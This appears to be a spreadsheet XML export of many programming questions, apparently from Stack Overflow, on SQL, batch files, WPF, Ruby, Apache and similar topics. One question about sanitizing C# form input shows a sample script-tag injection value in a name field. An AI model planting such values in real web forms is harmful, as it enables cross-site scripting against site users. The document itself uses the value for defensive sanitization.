  <si>
    <t xml:space="preserve">&lt;p&gt;If a person is looking to batch convert a large number of raster images into vector graphics, are there any tools out there that do that well?&lt;/p&gt;
&lt;p&gt;For an example, think of just about any diagram that has standard shapes (ellipses, rectangles) and text.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any way to transfer value from one cell to another?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way in the SQL language or in MySQL (or other DBMA) to transfer a value from one cell to another? For example, say there is a table called user_cars with the following structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;|id| |user_name| |num_cars|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bob has 5 cars, and John has 3 cars. Is there any way to in one query subtract 2 cars from Bob and add 2 to John? I know this can be done with two update queries, but I'd just like to know if there was a more efficient way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to launch multiple Internet Explorer windows/tabs from batch file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like a batch file to launch two separate programs then have the command line window close. Actually, to clarify, I am launching Internet Explorer with two different URLs.&lt;/p&gt;
&lt;p&gt;So far I have something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;start "~\iexplore.exe" "url1"
start "~\iexplore.exe" "url2"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I get is one instance of Internet Explorer with only the second URL loaded. Seems the second is replacing the second. I seem to remember a syntax where I would load a new command line window and pass the command to execute on load, but can't find the reference.&lt;/p&gt;
&lt;p&gt;As a second part of the question: what is a good reference URL to keep for the times you need to write a quick batch file?&lt;/p&gt;
&lt;p&gt;Edit: I have marked an answer, because it does work. I now have two windows open, one for each URL. (thanks!) The funny thing is that without the /d approach using my original syntax I get different results based on whether I have a pre-existing Internet Explorer instance open. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If I do I get two new tabs added for
my two URLs (sweet!)  &lt;/li&gt;
&lt;li&gt;If not I get only one final tab for the second URL I passed in.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to use C# to sanitize input on an html page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a library or acceptable method for sanitizing the input to an html page?&lt;/p&gt;
&lt;p&gt;In this case I have a form with just a name, phone number, and email address.  &lt;/p&gt;
&lt;p&gt;Code must be C#.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"&amp;lt;script src='bobs.js'&amp;gt;John Doe&amp;lt;/script&amp;gt;" should become "John Doe"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the correct LINQtoSQL-ish way to do a table truncate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project with a formidable data access layer using LinqtoSQL for just about anything touching our databases. I needed to build a helper class that bridges some common crud operations from CLSA objects to LinqToSql ones. Everything has been operating swimmingly until I needed to do a truncate on a table and all I had were â€œdeleteâ€ methods.&lt;/p&gt;
&lt;p&gt;Uh-oh. A quick search reveals that some people are using YourContext.ExecuteCommand(), which is nice and all, but I am trying to go â€œt-sql-lessâ€ as much as possible these days.&lt;/p&gt;
&lt;p&gt;Is there a LINQ way to perform a &lt;a href="http://msdn.microsoft.com/en-us/library/aa260621(SQL.80).aspx" rel="nofollow"&gt;truncate on a table&lt;/a&gt;? Or am I just &lt;a href="http://en.wikipedia.org/wiki/Clueless_(film)" rel="nofollow"&gt;clueless&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How To Get Photo IDs from Flickr API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use JQUERY to grab photos from a Flickr group. I can get back valid JSON, but can't figure out how to get access to the actual photos. The JSON that is returned contains an empty list where I would expect photos.&lt;/p&gt;
&lt;p&gt;So when I plug this into the browser:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://api.flickr.com/services/rest?method=flickr.groups.pools.getPhotos&amp;amp;api_key=2c4df0060561b03151cda6a1xxxx&amp;amp;format=json&amp;amp;group_id=919043@N22&amp;amp;jsoncallback=?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The json that I get back is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; jsonFlickrApi({"photos":{"page":1, "pages":1, "perpage":100, "total":"6", "photo":[]}, "stat":"ok"})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems like it knows that there are six photos, but the photo list is empty. I assume I am missing a step. Any help would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good language &amp; framework for cross platform (windows &amp; mac) desktop application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The last cross platform desktop development I did was Java/Swing.  What about flex?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Replace in multiple files - graphical tool for Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It needs to be graphical. No sed, awk, grep, perl, whatever. I know how to use those and I do use them now, but I need to cherry-pick each replace in 300+ files.&lt;/p&gt;
&lt;p&gt;I want a tool where I can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;type a search string&lt;/li&gt;
&lt;li&gt;type a replace string&lt;/li&gt;
&lt;li&gt;select a directory and file extension&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and it would recursively go into each file in that directory and its sub-directories, open it and scroll to the place where search string is and offer two options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;replace (and find next)&lt;/li&gt;
&lt;li&gt;find next&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nothing more. Reg.exp. support is a plus, but not required.&lt;/p&gt;
&lt;p&gt;SOLVED: Regexxer is exactly what I needed. In case someone needs it on Slackware, &lt;a href="http://swoes.blogspot.com/2008/10/regexxer-on-slackware-121.html"&gt;here's&lt;/a&gt; what you need to download and how to compile it (choosing correct version of each dependency can be a PITA)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem using SQLite :memory: with NHibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use NHibernate for my dataacess, and for awhile not I've been using SQLite for local integration tests.  I've been using a file, but I thought I would out the :memory: option.  When I fire up any of the integration tests, the database seems to be created (NHibernate spits out the table creation sql) but interfacting with the database causes an error.&lt;/p&gt;
&lt;p&gt;Has anyone every gotten NHibernate working with an in memory database?  Is it even possible?  The connection string I'm using is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Data Source=:memory:;Version=3;New=True
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Detect GCC compile-time flags of a binary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to find out what gcc flags a particular binary was compiled with?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to put WPF Tab Control tabs on the side</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a Tab Control in WPF that has the tabs arranged down the right side of the control, with the text rotated 90 degrees The look is similar to those plastic tabs you can buy and use in a notebook. I have tried changing the TabStripPlacement to Right, but it just stacks the tabs up on the top right side of the control - not at all what I had in mind.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect that the Internet connection is offline?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to detect that the Internet connection is offline in JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find my .emacs file for Emacs running on Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried looking for the .emacs file for my Windows install for Emacs but could not find it. Does it have the same filename under Windows as in Unix? Do I have to create it myself? If so, under what specific directory does it go?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speed of multiple variable assignment in T-SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine I have a chunk of initialisation code at the top of a stored procedure with a number of variable assignments:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SET @proc = 'sp_madeupname'
SET @magic_number = 42
SET @tomorrows_date = DATEADD(dd, 1, GETDATE())
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Clearly doing all of the above as one SELECT would be faster:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT
     @proc = 'sp_madeupname'
    ,@magic_number = 42
    ,@tomorrows_date = DATEADD(dd, 1, GETDATE())
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;em&gt;how much&lt;/em&gt; faster? Say if this stored procedure was executed as part of a loop, several thousand times, is it going to make any significant difference to the performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MS Office hyperlinks change code page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you paste the following URL into IE: &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897434.aspx" rel="nofollow"&gt;http://technet.microsoft.com/en-us/sysinternals/bb897434.aspx&lt;/a&gt;, the link on the right of the page cleanly says "Download Zoomit (77 KB)".  If you paste the link into an Office document (Word, Excel, PowerPoint -- tested using Office 2003), and activate the link from the document, that same text has picked up a couple of A-circumflex symbols.  This is because the source HTML contains "&amp;amp;nbsp;" entities (non-breaking space) which get translated to Unicode 00A0.  In UTF-8, this is expressed as X'C2A0', and then the X'C2' gets displayed as a A-circumflex.  I don't completely understand how the code pages get mixed up like this, but I'd really like to find a HTML meta http-equiv charset value that will cause my pages containing the nbsp-entity to display properly even when linked from an Office document.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database localization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am looking for opinions if the following problem maybe has a better/different/common solution:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I have a database for products which contains the names of the products in english (the default language of this application) and i need translations of the names if available.&lt;/p&gt;
&lt;p&gt;Currently i have this setup:&lt;/p&gt;
&lt;p&gt;A product table&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE products
(
  id serial NOT NULL,
  "name" character varying(255) NOT NULL,
  CONSTRAINT products_pkey PRIMARY KEY (id)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and a product localization table&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE products_l10n
(
  product_id serial NOT NULL,
  "language" character(2) NOT NULL,
  "name" character varying(255) NOT NULL,
  CONSTRAINT products_l10n_pkey PRIMARY KEY (product_id, language),
  CONSTRAINT products_l10n_product_id_fkey FOREIGN KEY (product_id)
      REFERENCES products (id) MATCH SIMPLE
      ON UPDATE CASCADE ON DELETE CASCADE
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and i use the following query to retrieve a list of localized products (german in this case) with fallback to the default english names:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT p.id, COALESCE(pl.name, p.name) 
from products p LEFT 
JOIN products_l10n pl ON p.id = pl.product_id AND language = 'de';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The SQL code is in postgres dialect. Data is stored as UTF-8.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieving the new ID from a SQLDataAdaptor.Update</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would you go about retrieving the @@IDENTITY value for each row when the SQLDataAdapater.Update is executed on a table?&lt;/p&gt;
&lt;p&gt;eg. Is it possible to modify/intercept the InsertCommand, generated by the SQLCommandBuilder, to say add an output parameter, and then retrieve its value in the da.RowUpdated event???&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is Apache executing .php.html files as PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an odd problem...I'm using a documentation generator which generates a lot of output like docs/foo.php.html. It's XHTML, and thus contains &lt;code&gt;&amp;lt;?xml...&amp;gt;&lt;/code&gt; tags at the beginning of file. The problem is, Apache has somehow decided to run it through the PHP interpreter, even though ".php" appears in the middle of the filename, and not at the end. This in turn triggers a PHP error, because it sees "&lt;code&gt;&amp;lt;?&lt;/code&gt;" as the command to start executing PHP code, and immediately gets confused by the "&lt;code&gt;xml...&lt;/code&gt;" which follows it.&lt;/p&gt;
&lt;p&gt;How do I configure Apache to ONLY execute .php files, and not .php.html files? The string "php.html" does not appear explicitly anywhere in my Apache config files. There is a line "&lt;code&gt;AddHandler php5-script .php&lt;/code&gt;", but I don't see how that would also include ".php.html" files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE6 generated strange worksheet name when doing export from java application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am encountering error like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;test(10)[1].csv file cannot be found at 
C:\Documents and Settings\Ron\Local Settings\Temporary Internet Files\Content.IE5\PQ0STUVW
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When trying to do export of CSV  file using the following codes.
Anyone have any idea what could be wrong? This issue does not occur in IE7 / Firefox and is only specific to IE6. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;response.setContentType("application/vnd.ms-excel");
response.setHeader("Content-Disposition", "attachment;filename=" + fileFullName);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the javascript MIME type for the type attribute of a script tag?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the &lt;a href="http://en.wikipedia.org/wiki/MIME"&gt;MIME&lt;/a&gt; type of javascript? &lt;/p&gt;
&lt;p&gt;More specifically, what is the right thing to put in the "type" attribute of a script tag? &lt;code&gt;application/x-javascript&lt;/code&gt; and &lt;code&gt;text/javascript&lt;/code&gt; seem to be the main contenders.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Daemon Threads Explanation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the &lt;a href="https://docs.python.org/2/library/threading.html#thread-objects"&gt;Python documentation&lt;/a&gt;
it says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A thread can be flagged as a "daemon thread". The significance of this
  flag is that the entire Python program exits when only daemon threads
  are left. The initial value is inherited from the creating thread.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone have a clearer explanation of what that means or a practical example showing where you would want to set threads as &lt;code&gt;daemonic&lt;/code&gt;?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;To clarify for me:&lt;/p&gt;
&lt;p&gt;so the only time you &lt;strong&gt;wouldn't&lt;/strong&gt; set threads as daemonic is if you wanted them to continue running after the main thread exits?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where and how does Windows XP store wep/wpa keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Like the title says Where and How (i.e. if encrypted, with what method) does Windows XP store WEP/WPA Keys?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create the migrations for a legacy database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently developing a Rails application using a database that was designed before I was aware of Rails existence.&lt;br /&gt;
I have currently created some migrations to add some new tables and new columns to existing tables.&lt;/p&gt;
&lt;p&gt;I would like to have the migrations to recreate the full database.&lt;/p&gt;
&lt;p&gt;Which steps should I follow?&lt;br /&gt;
Should I create all the migrations by hand?&lt;/p&gt;
&lt;p&gt;EDIT: I am interested in the database schema not in the database contents&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing ASP.Net 2.0 after IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just got a dedicated server from a hosting company, and for some reason, it didn't have IIS installed.
It did have .Net 2.0, though.&lt;/p&gt;
&lt;p&gt;So I installed IIS, but now my ASP.net websites won't work.
I just get a 404, no event log entries, nothing...&lt;/p&gt;
&lt;p&gt;I noticed in the redistributable package information that:
"To access the features of ASP.NET, IIS with the latest security updates must be installed prior to installing the .NET Framework"&lt;/p&gt;
&lt;p&gt;I also can't uninstall .Net, it just won't let me...&lt;/p&gt;
&lt;p&gt;Is there a way to reinstall .Net 2.0, or somehow do whatever it is it does to IIS to make it work?&lt;/p&gt;
&lt;p&gt;Thanks!
Daniel&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows swapping redundantly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This may not be strictly programming related but more OS-structure related.&lt;/p&gt;
&lt;p&gt;Running Vista 32 bit on a brand new laptop with 3GB of memory, Running idle the system consumes about 40% of its memory. Other then the fact that this is outrageous on its own right, the OS &lt;strong&gt;should be able to fit all of the processes nicely into memory&lt;/strong&gt; and not need to swap to disk EVER.&lt;br /&gt;
Yet looking at the task manager I see processes having page faults all the time. Not many but still. for instance explorer.exe has one every second approximately.&lt;/p&gt;
&lt;p&gt;Why is that? Why does the OS feel the need to swap out pages although it has plenty of physical memory?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing more than 1 data item at a single index in a linked-list?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to store more than 1 data item at a single index in my linked-list.  All of the examples in my textbook seem to illustrate adding only 1 piece of data per index.  I'm assuming it is possible to add more?&lt;/p&gt;
&lt;p&gt;For example, using the Collections API to store an integer I would do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LinkedList &amp;lt;Integer&amp;gt;linky = new LinkedList&amp;lt;Integer&amp;gt;();
int num1 = 2, num2 = 22, num3 = 25, num4 = 1337;
linky.add(num1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I go about adding num2, num3, and num4 to the same first index in the list?  Thanks guys.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specify parts of the header that have to be signed and/or encrypted in WCF with binding that support standards</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Ws2007HttpBinding and securing the service, the WSDL file generated shows in the policy section that all the ws-addressing headers and the body will be signed, and that the body will be encrypted.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;sp:SignedParts&amp;gt;
  &amp;lt;sp:Body /&amp;gt; 
  &amp;lt;sp:Header Name="To" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="From" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="FaultTo" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="ReplyTo" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="MessageID" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="RelatesTo" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
  &amp;lt;sp:Header Name="Action" Namespace="http://www.w3.org/2005/08/addressing" /&amp;gt; 
&amp;lt;/sp:SignedParts&amp;gt;
&amp;lt;sp:EncryptedParts&amp;gt;
  &amp;lt;sp:Body /&amp;gt; 
&amp;lt;/sp:EncryptedParts&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We would like to specify which headers have to be signed and/or encrypted, like it is possible in Apache rampart. For custom header or body elements, it is possible using annotations in the code, but for these elements that are added by the binding itself, is is possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I store multiple values in a Perl hash table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Up until recently, I've been storing multiple values into different hashes with the same keys as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;%boss = (
    "Allan"  =&amp;gt; "George",
    "Bob"    =&amp;gt; "George",
    "George" =&amp;gt; "lisa" );
%status = (
    "Allan"  =&amp;gt; "Contractor",
    "Bob"    =&amp;gt; "Part-time",
    "George" =&amp;gt; "Full-time" );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then I can reference &lt;code&gt;$boss("Bob")&lt;/code&gt; and &lt;code&gt;$status("Bob")&lt;/code&gt; but this gets unwieldy if there's a lot of properties each key can have and I have to worry about keeping the hashes in sync.&lt;/p&gt;
&lt;p&gt;Is there a better way for storing multiple values in a hash?  I could store the values as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        "Bob" =&amp;gt; "George:Part-time"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then disassemble the strings with split, but there must be a more elegant way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache + mod_lisp + clisp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to to configure apache + mod_lisp + clisp and set up a "Hello World!"? I couldn't find any complete howto on the subject. Thanks.&lt;/p&gt;
&lt;p&gt;Edit: Vebjorn's solution works, but then I don't how to code the "hello world!". Can anyone tell me how to proceed? There's something like SWANKing the clisp, then connect to it with SLIME, but then when I launch mod_lisp's demo, the test page is not served and my slime doesn't return?&lt;/p&gt;
&lt;p&gt;Thanks again.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery animate backgroundColor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to animate a change in backgroundColor using jQuery on mouseover.&lt;/p&gt;
&lt;p&gt;I have checked some example and I seem to have it right, it works with other properties like fontSize, but with backgroundColor I get and "Invalid Property" js error.
The element I am working with is a div.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(".usercontent").mouseover(function() {
    $(this).animate({ backgroundColor: "olive" }, "slow");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Ruby have a built-in do ... while?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ruby has a wealth of conditional constructs, including &lt;code&gt;if&lt;/code&gt;/&lt;code&gt;unless&lt;/code&gt;, &lt;code&gt;while&lt;/code&gt;/&lt;code&gt;until&lt;/code&gt; etc.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;while&lt;/code&gt; block from C:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (condition) {
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;can be directly translated to Ruby:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while condition 
    ...
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I can't seem to find a &lt;em&gt;built-in&lt;/em&gt; equivalent in Ruby for a C-like &lt;code&gt;do ... while&lt;/code&gt; block in which the block contents are executed at least once:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;do { 
    ... 
} while (condition);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting ruby hash .default to a list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought I understood what the default method does to a hash... &lt;/p&gt;
&lt;p&gt;Give a default value for a key if it doesn't exist:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;irb(main):001:0&amp;gt; a = {}
=&amp;gt; {}
irb(main):002:0&amp;gt; a.default = 4
=&amp;gt; 4
irb(main):003:0&amp;gt; a[8]
=&amp;gt; 4
irb(main):004:0&amp;gt; a[9] += 1
=&amp;gt; 5
irb(main):005:0&amp;gt; a
=&amp;gt; {9=&amp;gt;5}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All good.&lt;/p&gt;
&lt;p&gt;But if I set the default to be a empty list, or empty hash, I don't understand it's behaviour at &lt;strong&gt;all&lt;/strong&gt;....&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;irb(main):001:0&amp;gt; a = {}
=&amp;gt; {}
irb(main):002:0&amp;gt; a.default = []
=&amp;gt; []
irb(main):003:0&amp;gt; a[8] &amp;lt;&amp;lt; 9
=&amp;gt; [9]                          # great!
irb(main):004:0&amp;gt; a
=&amp;gt; {}                           # ?! would have expected {8=&amp;gt;[9]}
irb(main):005:0&amp;gt; a[8]
=&amp;gt; [9]                          # awesome!
irb(main):006:0&amp;gt; a[9]
=&amp;gt; [9]                          # unawesome! shouldn't this be [] ??
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was hoping/expecting the same behaviour as if I had used the ||= operator...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;irb(main):001:0&amp;gt; a = {}
=&amp;gt; {}
irb(main):002:0&amp;gt; a[8] ||= []
=&amp;gt; []
irb(main):003:0&amp;gt; a[8] &amp;lt;&amp;lt; 9
=&amp;gt; [9]
irb(main):004:0&amp;gt; a
=&amp;gt; {8=&amp;gt;[9]}
irb(main):005:0&amp;gt; a[9]
=&amp;gt; nil
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone explain what is going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# controls in a MFC Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am responsible for the User Interface of an application written completely in Visual C++  using MFC and some third-part controls. I would like to use C# (WinForms or even better WPF) to improve the application look&amp;amp;feel.&lt;/p&gt;
&lt;p&gt;I would like some advices about how to do it. Links, articles, examples...&lt;/p&gt;
&lt;p&gt;Right now the user interface is isolated in a single project and I don't want to compile the whole module with CLR. So how do I have to manage that from the architectural point of view?&lt;/p&gt;
&lt;p&gt;I have already looked at the Internet for the subject and read MSDN information. I would like more detailed information...is it convinient? pros/cons? have you used this approach successfully in a "big" application?
I don't want to compile the whole ui project with CLR...can I just have all the .NET code in a isolated project and call it from the ui project? what's the best way to do it?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convert my current page to pdf after some content dynamically added via AJAX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have found some libraries or web services in PHP that does the job. The problem is that the conversion is done when the page is fully loaded, I would like to &lt;strong&gt;convert the page to PDF&lt;/strong&gt; &lt;strong&gt;after some content dynamically added via AJAX&lt;/strong&gt; in onload event. &lt;/p&gt;
&lt;p&gt;Thank you very much,
Omar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Order of tags in &lt;head&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;does it matter at all what order the &lt;code&gt;&amp;lt;link&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;meta&amp;gt;&lt;/code&gt; tags are in in the &lt;code&gt;&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;(daft question but one of those things i've never given any thought to until now.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>T4 Template directory missing on build server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just set up a new build server with the Windows 2008 .NET 3.5 SDK, and for some reason it hasn't installed c:\Program Files\Common Files\Microsoft Shared\TextTemplating so I can't run t4 templates on it. I had a look at the install options in add/remove programs and every single option is checked. &lt;/p&gt;
&lt;p&gt;Any ideas why it is missing? Any ideas how to get it back?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get a complete list of object's methods and attributes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;dir(re.compile(pattern)) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;does not return pattern as one of the lists's elements. Namely it returns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;['__copy__', '__deepcopy__', 'findall', 'finditer', 'match', 'scanner', 'search', 'split', 'sub', 'subn']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;According to the manual, it is supposed to contain &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;the object's attributes' names, the
  names of its class's attributes, and
  recursively of the attributes of its
  class's base classes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It says also that&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The list is not necessarily complete.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is there a way to get the &lt;strong&gt;complete&lt;/strong&gt; list? I always assumed that dir returns a complete list but apparently it does not...&lt;/p&gt;
&lt;p&gt;Also: is there a way to list only attributes? Or only methods?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit: this is actually a bug in python -&gt; supposedly it is fixed in the 3.0 branch (and perhaps also in 2.6)&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QDockWidget initial width</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I set the initial width of a QDockWidget?&lt;/p&gt;
&lt;p&gt;I have implemented the sizeHint function but what next?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Built in code generation in vs.net 2008? or free via MS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What code generation tools are built-in to vs.net 2008 or are officially available via Microsoft?&lt;/p&gt;
&lt;p&gt;I know of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Entity Framework&lt;/li&gt;
&lt;li&gt;sqlmetal&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What else is there?&lt;/p&gt;
&lt;p&gt;Ideally i'm looking for something that will generate from an existing database schema.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I extract the version and path from an SVN working copy into a nant variable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a new build process for a DotNet project which is to be held in Subversion.&lt;/p&gt;
&lt;p&gt;For each dll/exe that I compile (via Nant) I would like to include 2 additional attibutes in the dlls that are built.&lt;/p&gt;
&lt;p&gt;I already understand the workings of the 'asminfo' nant task. But I need help retrieving the information which I hope to embed in my binaries.&lt;/p&gt;
&lt;p&gt;The build will always happen from a full working copy (checked out by the build process itself.) and will therefore always have an .svn directory available.&lt;/p&gt;
&lt;p&gt;The attributes I want to add are RepositoryVersion and RepositoryPath. (I understand that these are not the names this information goes by in svn)&lt;/p&gt;
